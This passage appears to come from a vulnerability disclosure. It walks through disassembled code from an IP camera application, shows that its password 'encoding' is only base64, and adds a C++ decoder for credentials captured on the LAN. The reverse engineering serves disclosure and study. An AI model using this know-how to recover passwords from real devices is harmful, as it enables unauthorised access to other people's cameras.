| ADD EAX,-4 | subtract 4 from total size |
| CMP EAX,DWORD PTR SS:[LOCAL.6] | compare our total bytes to the bytes read |
| JG SHORT 0A729D50 | jump back if we are not done |
| MOV EDX,DWORD PTR SS:[LOCAL.3] | set EDX to our last dword of the encoded buffer |
| MOVSX ECX,BYTE PTR DS:[EDX+3] | set ECX to dword[3], the last byte of our half-decoded dword (dword + 3) |
| INC ECX | increment the value of dword[3] |
| JE SHORT 0A729E1E | taken when dword[3] was -1, i.e. the table returned 0xFF for the last input byte |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | set EAX to our current half-decoded dword |
| MOV DL,BYTE PTR DS:[EAX] | set EDX (DL) to dword[0] |
| SHL EDX,2 | shift left 2 dword[0] |
| MOV ECX,DWORD PTR SS:[LOCAL.3] | set ECX to our current encoded dword position |
| MOVSX EAX,BYTE PTR DS:[ECX+1] | set EAX to dword[1] |
| SAR EAX,4 | shift right 4 dword[1] |
| ADD DL,AL | add (dword[0] << 2) + (dword[1] >> 4) |
| MOV ECX,DWORD PTR SS:[LOCAL.5] | set ECX to point at our next spot in our decoded buffer |
| MOV BYTE PTR DS:[ECX],DL | write our decoded value (EDX/DL) to our decoded buffer |
| INC DWORD PTR SS:[LOCAL.5] | move to the next spot in our decoded buffer |
| MOV EDX,DWORD PTR SS:[LOCAL.3] | set EDX to point at our dword |
| MOV AL,BYTE PTR DS:[EDX+1] | set EAX/AL to dword[1] |
| SHL EAX,4 | shift left 4 dword[1] |
| MOV EDX,DWORD PTR SS:[LOCAL.3] | set EDX to our current dword |
| MOVSX ECX,BYTE PTR DS:[EDX+2] | set ECX to dword[2] |
| SAR ECX,2 | shift right 2 dword[2] |
| ADD AL,CL | add (dword[1] << 4) + (dword[2] >> 2) |
| MOV EDX,DWORD PTR SS:[LOCAL.5] | set EDX to point at our current spot in our decoded buffer |
| MOV BYTE PTR DS:[EDX],AL | write our decoded value to the decoded buffer |
| INC DWORD PTR SS:[LOCAL.5] | move to the next spot in our decoded buffer |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | set EAX to point at our current dword |
| MOV CL,BYTE PTR DS:[EAX+2] | set ECX/CL to dword[2] |
| SHL ECX,6 | shift left 6 dword[2] |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | point EAX at our current dword |
| ADD CL,BYTE PTR DS:[EAX+3] | add dword[3] + (dword[2] << 6) |
| MOV EDX,DWORD PTR SS:[LOCAL.5] | point EDX at our current decoded buffer |
| MOV BYTE PTR DS:[EDX],CL | write our decoded value to the decoded buffer |
| INC DWORD PTR SS:[LOCAL.5] | increment our decoded buffer pointer |
| MOV ECX,DWORD PTR SS:[ARG.4] | set ECX to our current offset? |
| ADD DWORD PTR DS:[ECX],3 | add 3 to our current byte counter? |
| JMP 0A729EA6 | jump |
Translated into English: the application first uses a lookup table to translate every byte of the input string, using the value of the current byte as an offset into the table. After it is done with "stage1" it traverses the translated buffer a dword at a time and does some bit shifting and addition to fully decode the value. Note that each addition is done on an 8-bit register (ADD CL,DL), so the high bits of the shifted values are discarded; this is exactly the base64 repacking of four 6-bit values into three bytes, which matches the base64 encoded password mentioned above. The following roughly shows the "stage2" routine:
(Dword[0] << 2) + (Dword[1] >> 4) = unencoded byte 1
(Dword[1] << 4) + (Dword[2] >> 2) = unencoded byte 2
(Dword[2] << 6) + Dword[3] = unencoded byte 3
I then confirmed that this routine worked on an "encoded" value that went over the wire from the application to the camera. After confirming the encoding scheme worked, I recreated the network transaction the application does with the camera to create a stand alone script that will retrieve the password from a camera that is on the same lan as the "attacker". The script can be found here, thanks to Jason Doyle for the original finding (@jasond0yle ).
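The script linked above is not reproduced on this page. The block below is an added example, not the post's script, that reimplements the two-stage routine annotated above in C++: stage 1 maps each input byte through a lookup table into the half-decoded buffer, and stage 2 walks that buffer four bytes at a time and packs each group into three output bytes with the shifts shown, truncating each sum to 8 bits as ADD CL,DL does. The post does not dump the contents of the table at 0A841934, so the table here is the standard base64 alphabet with 0xFF for every other byte (including '='), an assumption consistent with the INC ECX / JE test on dword[3]; the padding branch that JE jumps to is not shown either, so the early exits on 0xFF below are the conventional base64 behaviour, also an assumption.

```cpp
// Added example, not the post's script. Assumptions: the lookup table is the
// standard base64 alphabet (0xFF elsewhere) and 0xFF ends a group as padding.
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Stage 1 table: 6-bit value for each base64 alphabet character, 0xFF otherwise.
static std::uint8_t table_lookup(unsigned char c) {
    static const std::string alphabet =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string::size_type pos = alphabet.find(static_cast<char>(c));
    return pos == std::string::npos ? 0xFF : static_cast<std::uint8_t>(pos);
}

// Stage 1: the first loop, one table lookup per input byte into the half-decoded buffer.
static std::vector<std::uint8_t> stage1(const std::string &encoded) {
    std::vector<std::uint8_t> half;
    for (unsigned char c : encoded) half.push_back(table_lookup(c));
    return half;
}

// Stage 2: the dword loop. Each sum is truncated to 8 bits, as the ADD CL,DL /
// ADD AL,CL instructions do, so the shifted-out high bits never reach the output.
static std::vector<std::uint8_t> stage2(const std::vector<std::uint8_t> &half) {
    std::vector<std::uint8_t> out;
    for (std::size_t i = 0; i + 4 <= half.size(); i += 4) {
        std::uint8_t d0 = half[i], d1 = half[i + 1], d2 = half[i + 2], d3 = half[i + 3];
        if (d0 == 0xFF || d1 == 0xFF) break;                      // not decodable
        out.push_back(static_cast<std::uint8_t>((d0 << 2) + (d1 >> 4)));  // unencoded byte 1
        if (d2 == 0xFF) break;                                    // "==" padding: one byte in this group
        out.push_back(static_cast<std::uint8_t>((d1 << 4) + (d2 >> 2)));  // unencoded byte 2
        if (d3 == 0xFF) break;                                    // "=" padding: two bytes in this group
        out.push_back(static_cast<std::uint8_t>((d2 << 6) + d3));         // unencoded byte 3
    }
    return out;
}

// Full routine: table translation followed by the dword repacking.
static std::string decode(const std::string &encoded) {
    std::vector<std::uint8_t> bytes = stage2(stage1(encoded));
    return std::string(bytes.begin(), bytes.end());
}

int main(int argc, char **argv) {
    if (argc != 2) { std::fprintf(stderr, "usage: decode <encoded>\n"); return 1; }
    std::string plain = decode(argv[1]);
    for (unsigned char c : plain) std::printf("%02x ", c);   // hex dump of the decoded bytes
    std::printf("\n%s\n", plain.c_str());
    return 0;
}
```

Feed it a value captured from the wire and compare the output with what a stock base64 decoder produces: if the two agree, the table at 0A841934 is the standard alphabet and the "encoding" offers no protection at all beyond obscurity, which is the point of the disclosure.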